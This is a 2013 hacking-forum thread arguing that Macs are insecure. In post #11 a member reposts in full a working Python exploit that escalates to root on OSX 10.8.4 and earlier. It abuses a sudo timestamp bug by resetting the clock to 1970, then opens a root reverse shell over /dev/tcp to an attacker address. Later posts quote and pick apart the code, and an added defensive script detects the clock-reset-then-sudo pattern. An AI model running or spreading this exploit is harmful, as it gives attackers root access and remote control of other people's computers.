I will scream at the next person who tells me Macs are secure!
RE: I will scream at the next person who tells me Macs are secure! #11
(10-19-2013, 02:10 AM)Putin Wrote: Literally at least 10% of macs are still on 10.8.4 or below.
Next time some apple lover tells you Macs are secure, show them this and briefly explain it, not like half of you will understand it anyway.
Code:
#!/usr/bin/python
###################################################################################################
# Exploit Title: OSX <= 10.8.4 Local Root Priv Escalation Root Reverse Shell
# Date: 08-27-2013
# Exploit Author: David Kennedy @ TrustedSec
# Website: https://www.trustedsec.com
# Twitter: @Dave_ReL1K
# Tested On: OSX 10.8.4
#
# Reference: http://www.exploit-db.com/exploits/27944/
#
# Example below:
# trustedsec:Desktop Dave$ python osx_esc.py
# [*] Exploit has been performed. You should have a shell on ipaddr: 127.0.0.1 and port 4444
#
# attacker_box:~ Dave$ nc -l 4444
# bash: no job control in this shell
# bash-3.2#
###################################################################################################
import subprocess

# IPADDR for REVERSE SHELL - change this to your attacker IP address
ipaddr = "192.168.1.1"

# PORT for REVERSE SHELL - change this to your attacker port address
port = "4444"

# drop into a root shell - replace 192.168.1.1 with the reverse listener
proc = subprocess.Popen('bash', shell=False, stdout=subprocess.PIPE, stdin=subprocess.PIPE, stderr=subprocess.PIPE)
proc.stdin.write("systemsetup -setusingnetworktime Off -settimezone GMT -setdate 01:01:1970 -settime 00:00;sudo su\nbash -i >& /dev/tcp/%s/%s 0>&1 &\n" % (ipaddr,port))
print """
###############################################################
#
# OSX <= 10.8.4 Local Root Priv Escalation Root Reverse Shell
#
# Written by: David Kennedy @ TrustedSec
# Website: https://www.trustedsec.com
# Twitter: @Dave_ReL1K
#
# Reference: http://www.exploit-db.com/exploits/27944/
###############################################################
"""
print "[*] Exploit has been performed. You should have a shell on ipaddr: %s and port %s" % (ipaddr,port)


Macs are secure :3

Reply

RE: I will scream at the next person who tells me Macs are secure! #12
Code:
#!/usr/bin/python
##Various comments##
import subprocess

# IPADDR for REVERSE SHELL - change this to your attacker IP address
ipaddr = "192.168.1.1"

# PORT for REVERSE SHELL - change this to your attacker port address
port = "4444"

# drop into a root shell - replace 192.168.1.1 with the reverse listener
proc = subprocess.Popen('bash', shell=False, stdout=subprocess.PIPE, stdin=subprocess.PIPE, stderr=subprocess.PIPE)
Ok, from python documentation for 3.2.2:
Code:
On Unix with shell=True, the shell defaults to /bin/sh. If args is a string, the string specifies the command to execute through the shell. This means that the string must be formatted exactly as it would be when typed at the shell prompt. This includes, for example, quoting or backslash escaping filenames with spaces in them.
and
Code:
If the stdin argument was PIPE, this attribute is a file object that provides input to the child process. Otherwise, it is None.

If the stdout argument was PIPE, this attribute is a file object that provides output from the child process. Otherwise, it is None.

If the stderr argument was PIPE, this attribute is a file object that provides error output from the child process. Otherwise, it is None.
So from what I understand, Popen('bash'... ) should open a bash shell, and the std*=subprocess.PIPE should give whatever the bash shell spits out as the "request" in the reverse shell.
Code:
proc.stdin.write("systemsetup -setusingnetworktime Off -settimezone GMT -setdate 01:01:1970 -settime 00:00;sudo su\nbash -i >& /dev/tcp/%s/%s 0>&1 &\n" % (ipaddr,port))
##More various junk###
First, what's with the date? Is it really necessary to -setdate 01:01:1970?
Second, shouldn't the second part,
sudo su\nbash -i >& /dev/tcp/%s/%s 0>&1 &\n" % (ipaddr,port)
require root access in the first place? I'm just a little confused, because it doesn't seem to me like we have root access yet, only access at the level of the person who runs the script.
Someone help? :(

Reply

I will scream at the next person who tells me Macs are secure! #13
(10-20-2013, 12:49 AM)3SidedSquare Wrote:
Code:
#!/usr/bin/python
##Various comments##
import subprocess

# IPADDR for REVERSE SHELL - change this to your attacker IP address
ipaddr = "192.168.1.1"

# PORT for REVERSE SHELL - change this to your attacker port address
port = "4444"

# drop into a root shell - replace 192.168.1.1 with the reverse listener
proc = subprocess.Popen('bash', shell=False, stdout=subprocess.PIPE, stdin=subprocess.PIPE, stderr=subprocess.PIPE)
Ok, from python documentation for 3.2.2:
Code:
On Unix with shell=True, the shell defaults to /bin/sh. If args is a string, the string specifies the command to execute through the shell. This means that the string must be formatted exactly as it would be when typed at the shell prompt. This includes, for example, quoting or backslash escaping filenames with spaces in them.
and
Code:
If the stdin argument was PIPE, this attribute is a file object that provides input to the child process. Otherwise, it is None.

If the stdout argument was PIPE, this attribute is a file object that provides output from the child process. Otherwise, it is None.

If the stderr argument was PIPE, this attribute is a file object that provides error output from the child process. Otherwise, it is None.
So from what I understand, Popen('bash'... ) should open a bash shell, and the std*=subprocess.PIPE should give whatever the bash shell spits out as the "request" in the reverse shell.
Code:
proc.stdin.write("systemsetup -setusingnetworktime Off -settimezone GMT -setdate 01:01:1970 -settime 00:00;sudo su\nbash -i >& /dev/tcp/%s/%s 0>&1 &\n" % (ipaddr,port))
##More various junk###
First, what's with the date? Is it really necessary to -setdate 01:01:1970?
Second, shouldn't the second part,
sudo su\nbash -i >& /dev/tcp/%s/%s 0>&1 &\n" % (ipaddr,port)
require root access in the first place? I'm just a little confused, because it doesn't seem to me like we have root access yet, only access at the level of the person who runs the script.
Someone help? :(

Quote: About five months ago, a bug was discovered on using the Date & Time settings within OSX 10.8.4 and below to perform a local privilege escalation from a normal user to root. The original flaw was a bug in Unix and sudo and allows the execution of changing the date and time to escalate to root permissions from a normal user. The flaw was recently put into the Metasploit Framework by Todd Miller (original bug discovery), Joev (wrote the module), and Juan Vazquez (bug testing and module fixing).
#MakeSinisterlySexyAgain

Reply
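
The sequence discussed in posts #12 and #13 (clock set back to 1970, then `sudo` by the same user) leaves a recognisable trail in process-execution logs. The following is an added detection example, not part of any post in this thread; the log format, field names and sample records are constructed assumptions.

```python
import shlex
from datetime import datetime

# Constructed records in arrival order. The format is hypothetical:
# "<ISO time> uid=<n> user=<name> cmd=<command line>"
SAMPLE_LOG = """\
2013-10-19T02:05:00 uid=502 user=alice cmd=systemsetup -settimezone GMT
2013-10-19T02:05:05 uid=502 user=alice cmd=sudo ls
2013-10-19T02:09:58 uid=501 user=dave cmd=systemsetup -setusingnetworktime Off -settimezone GMT -setdate 01:01:1970 -settime 00:00
1970-01-01T00:00:01 uid=501 user=dave cmd=sudo su
"""

def parse(line):
    ts, uid, user, cmd = line.split(" ", 3)
    return {"ts": datetime.fromisoformat(ts),
            "uid": int(uid.split("=", 1)[1]),
            "user": user.split("=", 1)[1],
            "argv": shlex.split(cmd.split("=", 1)[1])}

def sets_clock_to_epoch(argv):
    """True for a systemsetup call whose -setdate value (mm:dd:yy[yy]) is in 1970."""
    if not argv or argv[0].rsplit("/", 1)[-1] != "systemsetup":
        return False
    for flag, value in zip(argv[1:], argv[2:]):
        if flag.lower() == "-setdate":
            return value.split(":")[-1] in ("1970", "70")
    return False

def find_clock_reset_then_sudo(lines, window=5):
    """Alert when a non-root user resets the clock to 1970 and then runs sudo.

    The window counts records, not seconds: once the clock has been reset,
    later timestamps are no longer trustworthy.
    """
    events = [parse(l) for l in lines if l.strip()]
    alerts = []
    for i, ev in enumerate(events):
        if ev["uid"] == 0 or not sets_clock_to_epoch(ev["argv"]):
            continue
        for later in events[i + 1:i + 1 + window]:
            if later["user"] == ev["user"] and later["argv"][:1] == ["sudo"]:
                alerts.append({"user": ev["user"],
                               "sudo_cmd": " ".join(later["argv"]),
                               "clock_regressed": later["ts"] < ev["ts"]})
                break
    return alerts

if __name__ == "__main__":
    for alert in find_clock_reset_then_sudo(SAMPLE_LOG.splitlines()):
        print(alert)
```

The `clock_regressed` field records that the follow-up record is stamped earlier than the reset itself, which is a useful secondary signal when correlating against other log sources.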

RE: I will scream at the next person who tells me Macs are secure! #14
Macs have terrible security. People fail to realize that the reason why fewer Mac users are taken advantage of is simply because there are fewer Mac users. :P

Reply

RE: I will scream at the next person who tells me Macs are secure! #15

I dislike every apple product for the simple fact they try to control everything!
This is the major reason I love linux, yet I still don't use it as my main OS because most games are not compatible with it. I will one day... I think this "failure" launch of win8, which looks kind of like a mobile OS, will bring people to try new linux-based OSes. I'm sincerely considering changing to linux when SteamOS arrives because there will be many custom distros out there that will satisfy my gaming and programming needs.

Reply

RE: I will scream at the next person who tells me Macs are secure! #16
Macs are secure *trollface*

Reply

I will scream at the next person who tells me Macs are secure! #17
(10-20-2013, 01:13 AM)Oni Wrote: Macs have terrible security. People fail to realize that the reason why fewer Mac users are taken advantage of is simply because there are fewer Mac users. :P

This is not true anymore. Shitty rats like jshit affect macs and windows so it's no extra effort.
#MakeSinisterlySexyAgain

Reply

RE: I will scream at the next person who tells me Macs are secure! #18
Macs were secure originally because most malware was built to run on windows. Now that macs are "a thing" people are developing for them, and in turn they're just as shitty as windows is.

I have an English teacher that's adamant she's queen of the fucking internet because she's "untouchable" on her mac. I explained jRat to her and she said "but that's only one virus..."

Idiots.

Reply

I will scream at the next person who tells me Macs are secure! #19
(10-20-2013, 03:37 AM)Cosmic Wrote: Macs were secure originally because most malware was built to run on windows. Now that macs are "a thing" people are developing for them, and in turn they're just as shitty as windows is.

I have an English teacher that's adamant she's queen of the fucking internet because she's "untouchable" on her mac. I explained jRat to her and she said "but that's only one virus..."

Idiots.

Explain that this is a freely accessible virus being run by hundreds of thousands of people.
#MakeSinisterlySexyAgain

Reply

RE: I will scream at the next person who tells me Macs are secure! #20
(10-20-2013, 01:34 AM)mig4ng Wrote:
I dislike every apple product for the simple fact they try to control everything!

That's the truth. The only reason I got a mac was because it was required to develop for the iPhone. Now for an example, there's this development platform called X-Code which is needed for any security tool (I pentest with my mac) (and Python is absolutely fucked on this thing) .. I reinstalled my OSX Lion and noticed X-Code wasn't compatible with my mac anymore, not because it really wasn't compatible, but because Apple blocked it out forcing me to pay for the "Mountain Lion" upgrade. I'm just getting my money's worth with this thing and it's back to Linux for me. (Games on Mac? No, your shit will turn into a burning coal in 10 minutes).

It's also plain as day that Steve Jobs copied the whole Unix/Linux source and called it his. Apple is a marketing company, not a tech company.


Rant complete.

Reply






